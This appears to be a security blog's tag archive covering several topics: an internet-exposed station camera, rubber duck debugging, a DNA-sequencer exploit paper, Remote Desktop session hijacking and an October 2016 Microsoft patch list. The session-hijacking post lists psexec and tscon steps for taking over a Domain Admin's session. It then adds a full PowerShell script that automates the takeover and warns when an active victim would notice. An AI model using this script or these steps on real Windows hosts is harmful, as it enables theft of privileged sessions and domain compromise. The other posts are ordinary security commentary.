Tag archives: security

So what if the camera is on the Internet?


Recently sekurak published an article [1] about cameras at one of the PKP railway stations being accessible directly from the Internet. Comments along the lines of "so what?" quickly appeared under the post. At first glance it may indeed seem that not much follows from it: just the picture from a single camera.

The problem starts when we look at such data through the lens of today's analytical capabilities. In the era of AI, image recognition and large-scale data analysis, even a single video source can provide very valuable information: about the movement of people, behaviour patterns, meetings, or the logistics of a given place.

It is worth setting this seemingly trivial situation against a recent report by The Telegraph, which stated: "Israel hacked Tehran's traffic cameras to spy on Khamenei […] Israel hacked nearly all of Tehran's traffic cameras to spy on Ali Khamenei before launching an attack to kill Iran's supreme leader." This shows that camera infrastructure, especially when it covers public space, can matter far beyond ordinary monitoring.

Even a single camera at a railway station, additionally with audio enabled, can be a very valuable source of information. What is more, it is easy to fall for the illusion that such a device is merely a passive sensor. In practice, an IP camera is nothing but a small computer connected to the network.

And that means it often runs an old, unpatched operating system with a vulnerable web interface and many publicly known security holes. In such a scenario the camera can become an entry point into the infrastructure, act as a jump host, enable network reconnaissance, and even lead to privilege escalation through vulnerabilities in the management interface (e.g. XSS or other classic web application bugs).

In short: this is not just a camera. It is a piece of IT infrastructure operating in a very sensitive place.

Besides, I am willing to bet that the first thing the 'administrator' of this camera did after being told it was accessible from the Internet, in a panic, from his own workstation (with a million other tabs open, cached credentials, and maybe even an administrative account), was to log in to this unfortunate camera to check and 'change the password'. If Sekurak's editors could log in to it, thousands of others could too. They might not have been so nice, and could have modified its firmware and introduced malicious changes to its code. Such devices should be treated as compromised and dangerous. Exactly as a doctor would treat a patient who came to an appointment with bleeding tears and blisters on the skin.

And once we start considering scenarios in which the compromise of such infrastructure can lead to real, kinetic effects in the physical world… that is a topic for a separate post.

I am also curious whether the camera required ActiveX…?

Rubber duck debugging

"Rubber duck debugging[1][2] is an informal method of debugging code. The programmer, trying to find errors in the code (code inspection), keeps a rubber duck or another inanimate object nearby. Line by line, the programmer explains to the duck (or the other object) the intended function of each segment of the code; during this walkthrough, bugs in the application should come to light.

The method is a variant of the 'thinking aloud' method[3], a procedure recognised as an effective way of speeding up problem solving."

https://pl.wikipedia.org/wiki/Metoda_gumowej_kaczuszki

Remote code execution on DNA sequencers…

… with appropriately synthesised DNA used as the medium…

A paper worth noting, from researchers at the University of Washington:

Abstract: "The rapid improvement in DNA sequencing has sparked a big data revolution in genomic sciences, which has in turn led to a proliferation of bioinformatics tools. To date, these tools have encountered little adversarial pressure. This paper evaluates the robustness of such tools if (or when) adversarial attacks manifest. We demonstrate, for the first time, the synthesis of DNA which — when sequenced and processed — gives an attacker arbitrary remote code execution. To study the feasibility of creating and synthesizing a DNA-based exploit, we performed our attack on a modified downstream sequencing utility with a deliberately introduced vulnerability. After sequencing, we observed information leakage in our data due to sample bleeding. While this phenomena is known to the sequencing community, we provide the first discussion of how this leakage channel could be used adversarially to inject data or reveal sensitive information. We then evaluate the general security hygiene of common DNA processing programs, and unfortunately, find concrete evidence of poor security practices used throughout the field. Informed by our experiments and results, we develop a broad framework and guidelines to safeguard security and privacy in DNA synthesis, sequencing, and processing."

Source: http://dnasec.cs.washington.edu/dnasec.pdf

Remote Desktop Session Hijacking


I don't know what people are getting so excited about… It is obvious that SYSTEM can get into the memory of any process, so why the big WOW that, already having a SYSTEM account, one can switch into the context of another logged-in user?

Maybe because that user may have higher privileges (e.g. Domain Admin)… But keep in mind that:

  1. To use the method of switching to SYSTEM you have to be an Administrator of the server on which that account is obtained.
  2. M$ and others say you should work with the lowest possible privileges, so why would anyone in their right mind log in, e.g. with Enterprise Admin privileges, to a computer where those privileges are not needed and which may be compromised? Read: https://technet.microsoft.com/en-us/library/cc700835.aspx and the quote: "Do not use service administrator accounts for day-to-day administrative tasks, such as account and member server management; instead, use your regular user account." [..] "Domain Admins credentials are required to perform the following steps:[..]"


So what is this, and how does it work?

  1. Find a computer on which we are an Admin and to which a Domain Admin has carelessly logged in. The following command helps here: query user
  2. Switch our privileges to SYSTEM:
    psexec -s \\localhost cmd
  3. List the sessions (query user again; note our own session name and the victim's session ID). Of course it is better if the victim's session is not active ;-P
  4. Attach the victim's session to ours. Note the argument order: tscon takes the ID of the session to take over, and /dest: names the session it should be attached to, i.e. ours:
    tscon <victim's session ID> /dest:<our session name>
  5. Enjoy 😉
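The procedure above, automated as an added example (this is not code from the original post). It assumes it is run inside the SYSTEM shell obtained in step 2, that query user is available on the host (it is missing on some Home editions), and that the account names passed as -OurUser and -TargetUser are the real names shown by query user. The names adm and victim in the dry run at the bottom, and the constructed query user output, are placeholders.

```powershell
# Added example, not code from the original post. Automates steps 1-4 of the
# session hijack. Assumptions: run as SYSTEM (the shell from step 2), `query user`
# available on the host, -OurUser/-TargetUser are the account names shown by it.

function ConvertFrom-QueryUser {
    # Parse the fixed-width table printed by `query user` into objects.
    # A disconnected session has an empty SESSIONNAME column, which the optional
    # (?:...)? group handles; the header line never matches, its ID column is not numeric.
    param([Parameter(Mandatory)][string[]]$Lines)
    $pattern = '^\s*(?<cur>>?)\s*(?<user>\S+)\s+(?:(?<session>\S+)\s+)?(?<id>\d+)\s+(?<state>\S+)'
    foreach ($line in $Lines) {
        if ($line -match $pattern) {
            [pscustomobject]@{
                User    = $Matches['user']
                Session = [string]$Matches['session']   # '' when the group did not match
                Id      = [int]$Matches['id']
                State   = $Matches['state']
                Current = ($Matches['cur'] -eq '>')      # '>' marks the caller's own session
            }
        }
    }
}

function Get-HijackPlan {
    # Pick the victim's session and ours, and build the tscon invocation.
    # tscon takes the ID of the session to take over and, via /dest, the NAME of the
    # session it is attached to (ours). Ours is chosen by user name rather than by the
    # '>' marker, because a shell started with psexec -s lives in session 0, and then
    # no line in `query user` carries the marker.
    param(
        [Parameter(Mandatory)][object[]]$Sessions,
        [Parameter(Mandatory)][string]$TargetUser,
        [Parameter(Mandatory)][string]$OurUser
    )
    $mine   = $Sessions | Where-Object { $_.User -eq $OurUser -and $_.Session -ne '' } | Select-Object -First 1
    $target = $Sessions | Where-Object { $_.User -eq $TargetUser } | Select-Object -First 1
    if (-not $mine)   { throw "No connected session found for $OurUser (a session name is needed for /dest)" }
    if (-not $target) { throw "No session found for $TargetUser" }
    if ($target.State -eq 'Active') {
        Write-Warning "Session $($target.Id) is Active: taking it over kicks the user off and will be noticed"
    }
    [pscustomobject]@{
        TargetId    = $target.Id
        DestSession = $mine.Session
        CommandLine = "tscon $($target.Id) /dest:$($mine.Session)"
    }
}

function Invoke-SessionHijack {
    param(
        [Parameter(Mandatory)][string]$TargetUser,
        [Parameter(Mandatory)][string]$OurUser,
        [switch]$DryRun
    )
    # Without SYSTEM, tscon refuses to attach another user's session (step 2 of the post).
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    if (-not $me.IsSystem) { throw "Not running as SYSTEM (current identity: $($me.Name)); see step 2" }
    $plan = Get-HijackPlan -Sessions (ConvertFrom-QueryUser -Lines (query user 2>&1)) `
                           -TargetUser $TargetUser -OurUser $OurUser
    if ($DryRun) { return $plan.CommandLine }
    & tscon.exe $plan.TargetId "/dest:$($plan.DestSession)"
}

# Dry run on constructed `query user` output (placeholder names; no SYSTEM shell needed):
$sample = @(
    ' USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME',
    '>adm                   rdp-tcp#0           2  Active          .  10/20/2016 9:12 AM',
    ' victim                                    1  Disc         1:15  10/20/2016 8:30 AM'
)
(Get-HijackPlan -Sessions (ConvertFrom-QueryUser -Lines $sample) -TargetUser victim -OurUser adm).CommandLine
```

On the box itself the call is Invoke-SessionHijack -TargetUser victim -OurUser adm, with -DryRun to only print the tscon line. The plan is built from the victim's session ID and our own session name, so a disconnected victim session (empty SESSIONNAME column) is handled, which is the case step 3 recommends.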

And for those who prefer videos, here is the YouTube version:

MS patches 10/2016


For posterity: from now on MS releases 'update bundles'… no more individual patches (?)

Critical and Security Updates
- Update for Windows 7 (KB3177467), x86 and x64: resolves issues in Windows; see the KB article for the list, a restart may be required.
- October, 2016 Security Only Update for .NET Framework 3.5.1 on Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB3188730), x86 and x64: security issue identified; a restart may be required.
- October, 2016 Security and Quality Rollup for .NET Framework 3.5.1 on Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB3188740), x86 and x64: security issue identified; a restart may be required.
- October, 2016 Security Monthly Quality Rollup for Windows 7 (KB3185330), x86 and x64: security issue identified; a restart may be required.
- October, 2016 Security Only Quality Update for Windows 7 (KB3192391), x86 and x64: security issue identified; a restart may be required.
- Security Update for Microsoft SharePoint Server 2010 (KB3118377), standard and farm-deployment: arbitrary code execution when a maliciously modified file is opened.
- Security Update for Microsoft Office 2010 (KB3118317), 32-bit and 64-bit editions: arbitrary code execution when a maliciously modified file is opened.
- Security Update for Microsoft Office 2010 (KB3118311), 32-bit and 64-bit editions: arbitrary code execution when a maliciously modified file is opened.
- Security Update for Microsoft Word 2010 (KB3118312), 32-bit and 64-bit editions: arbitrary code execution when a maliciously modified file is opened.
- Security Update for Microsoft Web Applications (KB3118384), standard and farm-deployment: arbitrary code execution when a maliciously modified file is opened.
- Security Update for Microsoft Silverlight (KB3193713): fixes outlined in KB 3193713; backward compatible with web applications built using previous versions of Silverlight.
- Security Update for Lync 2010 (KB3188397), x86 and x64: security issue identified in a Microsoft Lync product; a restart may be required.
- Security Update for Lync 2010 Attendee – Administrator level installation (KB3188400): security issue identified in a Microsoft Lync product; a restart may be required.
Other Updates
- Windows Malicious Software Removal Tool – June 2016 and October 2016 (KB890830), x86 and x64: runs once after download to check for and remove specific prevalent malware (including Blaster, Sasser and Mydoom); a new version is offered every month; not a replacement for an antivirus product.
- Update for Windows 7 (KB3063109), x86 and x64: resolves issues in Windows; see the KB article.
- Update for Windows 7 (KB2952664), x86 and x64 (offered twice in the catalogue): resolves issues in Windows; see the KB article.
- Microsoft Silverlight (KB3193713): the browser plug-in itself for Windows and Mac OS X (media playback including Windows Media and H.264 up to HD, rich Internet applications in and out of browser, includes the .NET framework).
- Update for Windows 7 (KB3181988), x86 and x64: resolves issues in Windows; see the KB article.
- Update for Windows 7 (KB3184143), x86 and x64: resolves issues in Windows; see the KB article.

More: https://blogs.technet.microsoft.com/windowsitpro/2016/08/15/further-simplifying-servicing-model-for-windows-7-and-windows-8-1/